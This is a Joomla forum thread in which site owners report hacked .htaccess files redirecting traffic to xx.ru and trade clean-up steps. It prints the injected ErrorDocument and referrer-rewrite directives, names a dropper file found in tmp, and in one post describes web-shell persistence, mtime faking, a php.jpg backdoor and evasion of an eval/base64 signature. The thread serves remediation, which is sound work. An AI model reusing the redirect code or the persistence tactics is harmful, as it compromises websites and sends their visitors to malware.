htaccess hacked, re-directing traffic to xx.ru
Moderators: mandville, General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
First "dot" files are hidden files that are not accessible to normal web requests (viewing) on a properly configured server. Just as a properly configured server won't list directory contents. On an improperly configured server that will expose the htaccess and directory contents, then showing the htaccess file or listing directory contents is going to be the least of your worries.
To answer your question though, yes the added code (either version) does prevent viewing the file, just not when someone hacks your site.
Once access to a site/domain is gained by some means other than normal web access, then everything is accessible. It does not matter what is put into the htaccess to "prevent" viewing. This includes the htaccess file, any password protected directories, any configuration files, and anything else both inside of and outside of the public_html directory.
Put it like this If I gain access then I can drop a 60k file on your site in some directory your not likely to look in or replace in an update. I can then view and control all aspects of your domain while I sit at my computer, no usernames and no passwords are required. All I have to do is call my script from a browser and bingo your entire domain is in front of me for me to do as I like.
Since it seems popular to add redirects to bad sites in your htacess, then I'll put a hidden script somewhere on your site to do this and detect if the code I added is removed. If so then the script will put it back. If I'm smart I'll go slightly more sophisticated, automate my scripts to replicate, hide my script(s) better and add a backdoor so you can't find script(s) by scanning for some @eval(gzinflate(base64_decode($code))); code. I'll also change the mtime of any files I add code to so the mtime is the same as what it originally was before I touched it.
On a misconfigured server or one with some exploit I can take advantage of, this same 60k script will allow me to both see and access every other domain account on the server as if it were a local drive on my computer and will in most cases also allow me to control the entire server. no root user or root password needed.
So unless you completely delete everything in the public_html directory and inspect closely whatever your going to reuse, and update everything to the latest version to close the security hole, and follow the rest of the stuff on the checklists, I will be back. If for no other reason than to mess with you. BTW, Remember that large image directory you did not take the time to inspect? It's only photos so no need to right? Well I put a file in there called rockymountain.php.jpg that allows me access to your site so I can hack your freshly cleaned and restored site.
To answer your question though, yes the added code (either version) does prevent viewing the file, just not when someone hacks your site.
Once access to a site/domain is gained by some means other than normal web access, then everything is accessible. It does not matter what is put into the htaccess to "prevent" viewing. This includes the htaccess file, any password protected directories, any configuration files, and anything else both inside of and outside of the public_html directory.
Put it like this If I gain access then I can drop a 60k file on your site in some directory your not likely to look in or replace in an update. I can then view and control all aspects of your domain while I sit at my computer, no usernames and no passwords are required. All I have to do is call my script from a browser and bingo your entire domain is in front of me for me to do as I like.
Since it seems popular to add redirects to bad sites in your htacess, then I'll put a hidden script somewhere on your site to do this and detect if the code I added is removed. If so then the script will put it back. If I'm smart I'll go slightly more sophisticated, automate my scripts to replicate, hide my script(s) better and add a backdoor so you can't find script(s) by scanning for some @eval(gzinflate(base64_decode($code))); code. I'll also change the mtime of any files I add code to so the mtime is the same as what it originally was before I touched it.
On a misconfigured server or one with some exploit I can take advantage of, this same 60k script will allow me to both see and access every other domain account on the server as if it were a local drive on my computer and will in most cases also allow me to control the entire server. no root user or root password needed.
So unless you completely delete everything in the public_html directory and inspect closely whatever your going to reuse, and update everything to the latest version to close the security hole, and follow the rest of the stuff on the checklists, I will be back. If for no other reason than to mess with you. BTW, Remember that large image directory you did not take the time to inspect? It's only photos so no need to right? Well I put a file in there called rockymountain.php.jpg that allows me access to your site so I can hack your freshly cleaned and restored site.
PhilD
-
- Joomla! Fledgling
- Posts: 4
- Joined: Thu Feb 16, 2012 10:45 am
Re: htaccess hacked, re-directing traffic to xx.ru
Thanks for all your replies. Issue is revolved for me, here's what I did:
- Upgraded all extensions to latest version
- Upgraded to latest Joomla
- Disabled eXtplorer (I don't even remember having it installed!)
- Blocked all admin accounts except for mine
- Changed my admin password
- Changed the FTP password
- Unpacked Joomla full version on to web server root, deleted installation folder
- Manually deleted all .htaccess files which where in the root ALL 1st level folders
- Used Admin Tools to generate a new htaccess file, left all settings as default
- Updated passwords for relevant admin accounts to be reactived
Seems to all be working good now. Thanks again for your replies. I have a huuuuuuge image directory on this site so there may still be malicious code lingering around. I'm going to download the whole site and sift through it manually to see if I can find anything else.
My host said that it's likely access was given to super admin account as there was an account with user of admin and password of password, which there definitely was not on the site previously. I'll be updating the database password too.
Cheers
- Upgraded all extensions to latest version
- Upgraded to latest Joomla
- Disabled eXtplorer (I don't even remember having it installed!)
- Blocked all admin accounts except for mine
- Changed my admin password
- Changed the FTP password
- Unpacked Joomla full version on to web server root, deleted installation folder
- Manually deleted all .htaccess files which where in the root ALL 1st level folders
- Used Admin Tools to generate a new htaccess file, left all settings as default
- Updated passwords for relevant admin accounts to be reactived
Seems to all be working good now. Thanks again for your replies. I have a huuuuuuge image directory on this site so there may still be malicious code lingering around. I'm going to download the whole site and sift through it manually to see if I can find anything else.
My host said that it's likely access was given to super admin account as there was an account with user of admin and password of password, which there definitely was not on the site previously. I'll be updating the database password too.
Cheers
-
- Joomla! Apprentice
- Posts: 6
- Joined: Mon Nov 24, 2008 3:07 pm
Re: htaccess hacked, re-directing traffic to xx.ru
Ok, this issue affected me, - I tried everything but in the end the only thing that worked was biting the bullet and wiping the orginal joomla install and installing the latest version (I know, I know this is what we are told by mods and experts but you'll try anything to cut corners - Thanks for the advice all)
Only posting this to save others some time if they think there is an easy shortcut
was also running PHPBB on my site - luckily did not need to remove and restore that
Only posting this to save others some time if they think there is an easy shortcut
was also running PHPBB on my site - luckily did not need to remove and restore that
- mandville
- Joomla! Master
- Posts: 15150
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: htaccess hacked, re-directing traffic to xx.ru
translates to http://docs.joomla.org/Top_10_Stupidest ... tor_Tricksbig vern wrote:(I know, I know this is what we are told by mods and experts but you'll try anything to cut corners -
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
ho,ho,ho,ho Mandville THAT is MEAN! (lot of high grade salt in open wounds) lolmandville wrote: translates to
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Site hacked .htaccess keeps changing
Hi Guys
I think my site has been hacked and I'm getting redirects to a russian site and pages not loading as they should. The main .htaccess file keeps changing / reappearing after deleting
400 http://xx.ru/in.cgi?4 ErrorDocument 401 http://xx.ru/in.cgi?4 ErrorDocument 403 http://xx.ru/in.cgi?4 ErrorDocument 404 http://xx.ru/in.cgi?4 ErrorDocument 500 http://xx.ru/in.cgi?4 <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|[youtube]|wikipedia|qq|excite </IfModule>
Any advice would be good. Have had a good search around on the forum and don't really know what to do next. Although had a Joomla site for many years, I've not had to deal with anything like this before!
Many thanks
Andy
I think my site has been hacked and I'm getting redirects to a russian site and pages not loading as they should. The main .htaccess file keeps changing / reappearing after deleting
400 http://xx.ru/in.cgi?4 ErrorDocument 401 http://xx.ru/in.cgi?4 ErrorDocument 403 http://xx.ru/in.cgi?4 ErrorDocument 404 http://xx.ru/in.cgi?4 ErrorDocument 500 http://xx.ru/in.cgi?4 <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|[youtube]|wikipedia|qq|excite </IfModule>
Any advice would be good. Have had a good search around on the forum and don't really know what to do next. Although had a Joomla site for many years, I've not had to deal with anything like this before!
Many thanks
Andy
Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 2nd April 2012 wrote:[21-Mar-2012 00:06:04] PHP Warning: include_once() [<a href=\'function.include\'>function.include</a>]: Failed opening \'/home/stli2847/public_html/jupgrade/administrator/components/com_acymailing/helpers/helper.php\' for inclusion (include_path=\'.:/usr/lib/php:/usr/local/lib/php:/home/stli2847/public_html/jupgrade/administrator/components/com_gcalendar/libraries\') in /home/stli2847/public_html/jupgrade/modules/mod_acymailing/mod_acymailing.php on line 9
Forum Post Assistant (v1.2.0) : 2nd April 2012 wrote:Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.4-Stable (Ember) 2-April-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: stli2847 (uid: 1013/gid: 1010) | Group: stli2847 (gid: 1010) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.18-238.12.1.el5 | Technology: x86_64 | Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 | Encoding: gzip, deflate | Doc Root: /home/stli2847/public_html | System TMP Writable: Yes
PHP Configuration :: Version: 5.2.17 | PHP API: cgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: 21st March 2012 00:06:04. | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 8M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M
MySQL Configuration :: Version: 5.1.61-log (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 3.15 MiB | #of _FPA_TABLE: 187Detailed Environment :: wrote:PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | filter (0.11.0) | ftp () | gd () | gettext () | hash (1.0) | iconv () | session () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | SimpleXML (0.1) | posix () | Reflection (0.1) | standard (5.2.17) | SPL (0.2) | mysqli (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | cgi () | eAccelerator (0.9.6.1) | suhosin (0.9.32.1) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: zip |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: MaybeFolder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |Templates Discovered :: wrote:Templates :: SITE :: siteground-j15-18 (1.0.0) | my_japurity (1.2.0) | beez_20 (2.5.0) | SiteGround-j16-7 (1.0.0) | siteground-j15-23 (1.0.0) | ProPages-FJT (1.7.0) | beez5 (2.5.0) | siteground-j16-5 (1.0.0) | 123wd-j15-2 (1.0.0) | atomic (2.5.0) | JA_Purity_ii (2.5.0) | bayolax (1.7.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |
Last edited by mandville on Mon Apr 02, 2012 7:18 pm, edited 1 time in total.
Reason: trimmed code, removed link
Reason: trimmed code, removed link
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Site hacked .htaccess keeps changing
Can you run the FPA with the extensions showing ?
Have you checked your computer ?
Have you checked your computer ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
Thanks for reply: Computer has been checked for viruses and malware
Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 3rd April 2012 wrote:[21-Mar-2012 00:06:04] PHP Warning: include_once() [<a href=\'function.include\'>function.include</a>]: Failed opening \'/home/stli2847/public_html/jupgrade/administrator/components/com_acymailing/helpers/helper.php\' for inclusion (include_path=\'.:/usr/lib/php:/usr/local/lib/php:/home/stli2847/public_html/jupgrade/administrator/components/com_gcalendar/libraries\') in /home/stli2847/public_html/jupgrade/modules/mod_acymailing/mod_acymailing.php on line 9
Forum Post Assistant (v1.2.0) : 3rd April 2012 wrote:Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.4-Stable (Ember) 2-April-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: stli2847 (uid: 1013/gid: 1010) | Group: stli2847 (gid: 1010) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.18-238.12.1.el5 | Technology: x86_64 | Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 | Encoding: gzip, deflate | Doc Root: /home/stli2847/public_html | System TMP Writable: Yes
PHP Configuration :: Version: 5.2.17 | PHP API: cgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: 21st March 2012 00:06:04. | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 8M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M
MySQL Configuration :: Version: 5.1.61-log (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 3.15 MiB | #of _FPA_TABLE: 187Detailed Environment :: wrote:PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | filter (0.11.0) | ftp () | gd () | gettext () | hash (1.0) | iconv () | session () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | SimpleXML (0.1) | posix () | Reflection (0.1) | standard (5.2.17) | SPL (0.2) | mysqli (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | cgi () | eAccelerator (0.9.6.1) | suhosin (0.9.32.1) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: zip |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: MaybeFolder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) :: NoneDatabase Information :: wrote:Database _FPA_STATS :: Uptime: 2317620 | Threads: 1 | Questions: 2493237 | Slow queries: 0 | Opens: 3078 | Flush tables: 1 | Open tables: 1318 | Queries per second avg: 1.75 |Extensions Discovered :: wrote:Components :: SITE :: com_wrapper (2.5.0) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.21) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.21) | WF_POPUPS_WINDOW_TITLE (2.0.21) | WF_AGGREGATOR_VIMEO_TITLE (2.0.21) | WF_AGGREGATOR_[youtube]_TITLE (2.0.21) | WF_LINKS_JOOMLALINKS_TITLE (2.0.21) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.21) | WF_BROWSER_TITLE (2.0.21) | WF_XHTMLXTRAS_TITLE (2.0.21) | WF_INLINEPOPUPS_TITLE (2.0.21) | WF_SPELLCHECKER_TITLE (2.0.21) | WF_IMGMANAGER_TITLE (2.0.21) | WF_LAYER_TITLE (2.0.21) | WF_VISUALCHARS_TITLE (2.0.21) | WF_LINK_TITLE (2.0.21) | WF_CONTEXTMENU_TITLE (2.0.21) | WF_MEDIA_TITLE (2.0.21) | WF_STYLE_TITLE (2.0.21) | WF_NONBREAKING_TITLE (2.0.21) | WF_CLEANUP_TITLE (2.0.21) | WF_PRINT_TITLE (2.0.21) | WF_TEXTCASE_TITLE (2.0.21) | WF_PREVIEW_TITLE (2.0.21) | WF_ARTICLE_TITLE (2.0.21) | WF_PASTE_TITLE (2.0.21) | WF_SEARCHREPLACE_TITLE (2.0.21) | WF_SOURCE_TITLE (2.0.21) | WF_DIRECTIONALITY_TITLE (2.0.21) | WF_FULLSCREEN_TITLE (2.0.21) | WF_AUTOSAVE_TITLE (2.0.21) | WF_TABLE_TITLE (2.0.21) | com_mailto (2.5.0) | os_authnet (1.0) | os_eway (1.0) | os_worldpay (1.0) | os_offline (1.0) | os_paypal (1.0) |
Components :: ADMIN :: com_banners (2.5.0) | com_messages (2.5.0) | com_admin (2.5.0) | com_plugins (2.5.0) | com_cpanel (2.5.0) | com_login (2.5.0) | JCE (2.0.21) | Editor - JCE (2.0.21) | Unknown (-) | AcyMailing (3.6.0) | AcyMailing : Statistics Plugin (3.6.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : trigger Joomla Co (3.6.0) | AcyMailing Module (3.6.0) | AcyMailing Manage text (1.0.0) | AcyMailing : share on social n (1.0.0) | AcyMailing Tag : Website links (3.6.0) | AcyMailing Tag : content inser (3.6.0) | AcyMailing : (auto)Subscribe d (3.6.0) | AcyMailing Tag : Joomla User I (3.6.0) | AcyMailing Tag : Date / Time (3.6.0) | AcyMailing Tag : Subscriber in (3.6.0) | AcyMailing Tag : Manage the Su (3.6.0) | AcyMailing Template Class Repl (3.6.0) | AcyMailing Tag : CB User infor (3.6.0) | com_templates (2.5.0) | com_checkin (2.5.0) | com_newsfeeds (2.5.0) | com_joomlaupdate (2.5.0) | com_modules (2.5.0) | com_content (2.5.0) | com_redirect (2.5.0) | com_categories (2.5.0) | com_weblinks (2.5.0) | com_finder (2.5.0) | com_users (2.5.0) | Event Booking (1.4.4) | com_config (2.5.0) | com_installer (2.5.0) | com_search (2.5.0) | com_media (2.5.0) | com_cache (2.5.0) | com_menus (2.5.0) | JoomGallery (2.0.0) | COM_GCALENDAR (2.6.4) | com_languages (2.5.0) |
Modules :: SITE :: mod_wrapper (2.5.0) | mod_custom (2.5.0) | mod_login (2.5.0) | MOD_GCALENDAR_NEXT (2.6.4) | mod_whosonline (2.5.0) | mod_articles_archive (2.5.0) | mod_menu (2.5.0) | mod_feed (2.5.0) | EB Cart (1.0.0) | mod_languages (2.5.0) | mod_footer (2.5.0) | AcyMailing Module (3.6.0) | mod_syndicate (2.5.0) | mod_banners (2.5.0) | mod_search (2.5.0) | mod_weblinks (2.5.0) | mod_users_latest (2.5.0) | mod_articles_latest (2.5.0) | mod_related_items (2.5.0) | Ebooking Mini Calendar (1.0) | Up-coming events (1.2) | mod_articles_category (2.5.0) | Search Events (1.0) | JoomImages (2.0 BETA 5) | mod_articles_popular (2.5.0) | Events By Location (1.0) | mod_articles_news (2.5.0) | MOD_GCALENDAR (2.6.4) | mod_random_image (2.5.0) | Event Categories (1.0) | MOD_GCALENDAR_UPCOMING (2.6.4) | mod_stats (2.5.0) | mod_articles_categories (2.5.0) | mod_breadcrumbs (2.5.0) | mod_finder (2.5.0) |
Modules :: ADMIN :: mod_title (2.5.0) | mod_custom (2.5.0) | mod_multilangstatus (2.5.0) | mod_login (2.5.0) | mod_toolbar (2.5.0) | mod_menu (2.5.0) | mod_feed (2.5.0) | mod_submenu (2.5.0) | mod_version (2.5.0) | mod_logged (2.5.0) | mod_status (2.5.0) | mod_popular (2.5.0) | mod_quickicon (2.5.0) | mod_latest (2.5.0) |
Plugins :: SITE :: plg_user_joomla (2.5.0) | plg_user_contactcreator (2.5.0) | plg_user_profile (2.5.0) | AcyMailing Tag : Website links (3.6.0) | AcyMailing : share on social n (1.0.0) | AcyMailing Tag : Joomla User I (3.6.0) | AcyMailing Tag : Subscriber in (3.6.0) | AcyMailing Tag : CB User infor (3.6.0) | AcyMailing Manage text (1.0.0) | AcyMailing Tag : Date / Time (3.6.0) | AcyMailing : trigger Joomla Co (3.6.0) | AcyMailing : Statistics Plugin (3.6.0) | AcyMailing Template Class Repl (3.6.0) | AcyMailing table of contents g (1.0.0) | AcyMailing Tag : Manage the Su (3.6.0) | AcyMailing Tag : content inser (3.6.0) | plg_search_weblinks (2.5.0) | plg_search_gcalendar (2.6.4) | plg_search_newsfeeds (2.5.0) | Search - Event Booking (1.0) | plg_search_content (2.5.0) | plg_search_categories (2.5.0) | plg_search_contacts (2.5.0) | plg_system_logout (2.5.0) | plg_system_log (2.5.0) | plg_system_gcalendar (2.6.4) | plg_system_cache (2.5.0) | plg_system_redirect (2.5.0) | plg_system_languagefilter (2.5.0) | plg_system_highlight (2.5.0) | plg_system_languagecode (2.5.0) | plg_system_remember (2.5.0) | JA T3 Framework (2.5.1) | plg_system_p3p (2.5.0) | Google Maps (2.15) | plg_system_sef (2.5.0) | plg_system_debug (2.5.0) | ebreminder (1.4.4) | AcyMailing : (auto)Subscribe d (3.6.0) | plg_editors-xtd_image (2.5.0) | plg_editors-xtd_readmore (2.5.0) | plg_editors-xtd_pagebreak (2.5.0) | PLG_JOOMBU (2.0 BETA) | plg_editors-xtd_article (2.5.0) | plg_editors_codemirror (1.0) | plg_editors_tinymce (3.4.9) | Editor - JCE (2.0.21) | Events Booking - Cart Update (1.0) | Events Booking - ACYMailing ne (1.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_authentication_gmail (2.5.0) | EB Event Plugin (1.0) | plg_content_emailcloak (2.5.0) | plg_content_geshi (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_vote (2.5.0) | plg_content_pagebreak (2.5.0) | plg_content_joomla (2.5.0) | EB Register Plugin (1.0) | PLG_JOOMPLU (2.0 BETA) | plg_gcalendar_next (2.6.4) | plg_content_pagenavigation (2.5.0) | plg_content_finder (2.5.0) | plg_finder_weblinks (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_content (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_contacts (2.5.0) | plg_captcha_recaptcha (2.5.0) | plg_extension_joomla (2.5.0) |Templates Discovered :: wrote:Templates :: SITE :: siteground-j15-18 (1.0.0) | my_japurity (1.2.0) | beez_20 (2.5.0) | SiteGround-j16-7 (1.0.0) | siteground-j15-23 (1.0.0) | ProPages-FJT (1.7.0) | beez5 (2.5.0) | siteground-j16-5 (1.0.0) | 123wd-j15-2 (1.0.0) | atomic (2.5.0) | JA_Purity_ii (2.5.0) | bayolax (1.7.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |
-
- Joomla! Explorer
- Posts: 359
- Joined: Thu Jun 14, 2007 2:48 pm
- Location: Coppell, Texas
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
I have one Joomla 1.5.25 site that got this same hack to the .htaccess file. There were also .htaccess files with the maliicious code in every Joomla sub directory, modules, plugins, administrator, images, templates, etc....
I have lots of Joomla sites on another host that has not been hacked, but I have one client that hosts his own site on a GoDaddy account.
I deleted every single folder & file on the hosting account & restored from a "History" version that GoDaddy keeps. This version did not have the malicious .htaccess files in it.
I upgraded to Joomla 1.5.26 but within a few minutes the root directory & all the Joomla sub directories had the hacked .htaccess files in them again (not sure if they got generated before I did the 1.5.26 upgrade.)
I deleted them again & so far they have not come back.
If they come back again I will post here.
I am wondering if they came from another account on the same server?
I have lots of Joomla sites on another host that has not been hacked, but I have one client that hosts his own site on a GoDaddy account.
I deleted every single folder & file on the hosting account & restored from a "History" version that GoDaddy keeps. This version did not have the malicious .htaccess files in it.
I upgraded to Joomla 1.5.26 but within a few minutes the root directory & all the Joomla sub directories had the hacked .htaccess files in them again (not sure if they got generated before I did the 1.5.26 upgrade.)
I deleted them again & so far they have not come back.
If they come back again I will post here.
I am wondering if they came from another account on the same server?
-
- Joomla! Explorer
- Posts: 359
- Joined: Thu Jun 14, 2007 2:48 pm
- Location: Coppell, Texas
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
The malicious code is back in the .htaccess file!
Not sure what is generating the code or where it is coming from.
The core joomla sub directories also have new .htaccess files in them, so far they are empty but I know some code is about to appear in them soon.
Not sure what to do about this now.
Not sure what is generating the code or where it is coming from.
The core joomla sub directories also have new .htaccess files in them, so far they are empty but I know some code is about to appear in them soon.
Not sure what to do about this now.
- mandville
- Joomla! Master
- Posts: 15150
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: htaccess hacked, re-directing traffic to xx.ru
if people run the cron commands here http://docs.joomla.org/Security_Checkli ... d_and_cron then that may help time stamp the insertion of the code so that your logs/host can track it down.
not on some busy sites a large email will be produced.
not on some busy sites a large email will be produced.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- jimbrooking
- Joomla! Enthusiast
- Posts: 104
- Joined: Thu Mar 17, 2011 12:38 am
Site Hacked - 404 errors hijacked
My site (http://www.fearringtonfha .org) was compromised on or about March 30. On Sunday, April 1 I found that all the .htaccess files on my Joomla 2.5 site (upgraded from 1.7 on March 18) had been modified to send traffic to a Russian malware site in case of any page error (401, 402, 403, 404, 500). I repaired all the .htaccess files. However 404 errors were still being redirected to the same Russian site.
This morning I changed my .htaccess file to handle 404 errors with a page within my Joomla site. This appears to work as expected, and 404 errors now go correctly to the page I specify in the .htaccess file.
Apparently some code within Joomla handles 404 errors (i.e., prior to my latest change to .htaccess), and apparently this code has somehow been compromised. Can anyone give me an idea of where to look for the bad code?
Thanks.
This morning I changed my .htaccess file to handle 404 errors with a page within my Joomla site. This appears to work as expected, and 404 errors now go correctly to the page I specify in the .htaccess file.
Apparently some code within Joomla handles 404 errors (i.e., prior to my latest change to .htaccess), and apparently this code has somehow been compromised. Can anyone give me an idea of where to look for the bad code?
Thanks.
Last edited by mandville on Tue Apr 03, 2012 11:39 am, edited 2 times in total.
Reason: Moved the topic from the forum Administration to Security
Reason: Moved the topic from the forum Administration to Security
-
- Joomla! Explorer
- Posts: 359
- Joined: Thu Jun 14, 2007 2:48 pm
- Location: Coppell, Texas
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
I think I have my site fixed.
After replacing the compromised .htaccess file in the root & deleting the .htaccess files in all the Joomla core sub directories, the .htaccess files were being regenerated. There is code inserted into the beginning of the core .htaccess that is in the root directory & also a little way below the bottom of the same .htaccess file.
After looking in the files carefully, and following some hints & found in these forums & other posts on the internet I found a file called "_cache_iccizijj.php" in the tmp sub directory. It has comments at the beginning of the file about vBulletin 3.1.9 including vBulletin copyright notice. It has a lot of very long strings of code that look like random key strokes but I suspect this file is generating the .htaccess files.
I renamed the _cache_iccizijj.php file & deleted the malicious code in the root .htacess file & deleted all the other .htaccess files in the Joomla core sub directories and my site has been trouble free now for several hours.
My site was Joomla 1.5.25 I upgraded it to 1.5.26. I changed the Super Admin & Admin user passwords.
It appears to be fixed now. I can type in an incorrect site url & I get the correct 404 page. I will post back here if the problem reoccurs. I am about to delete the renamed _cache_iccizijj.php file.
After replacing the compromised .htaccess file in the root & deleting the .htaccess files in all the Joomla core sub directories, the .htaccess files were being regenerated. There is code inserted into the beginning of the core .htaccess that is in the root directory & also a little way below the bottom of the same .htaccess file.
After looking in the files carefully, and following some hints & found in these forums & other posts on the internet I found a file called "_cache_iccizijj.php" in the tmp sub directory. It has comments at the beginning of the file about vBulletin 3.1.9 including vBulletin copyright notice. It has a lot of very long strings of code that look like random key strokes but I suspect this file is generating the .htaccess files.
I renamed the _cache_iccizijj.php file & deleted the malicious code in the root .htacess file & deleted all the other .htaccess files in the Joomla core sub directories and my site has been trouble free now for several hours.
My site was Joomla 1.5.25 I upgraded it to 1.5.26. I changed the Super Admin & Admin user passwords.
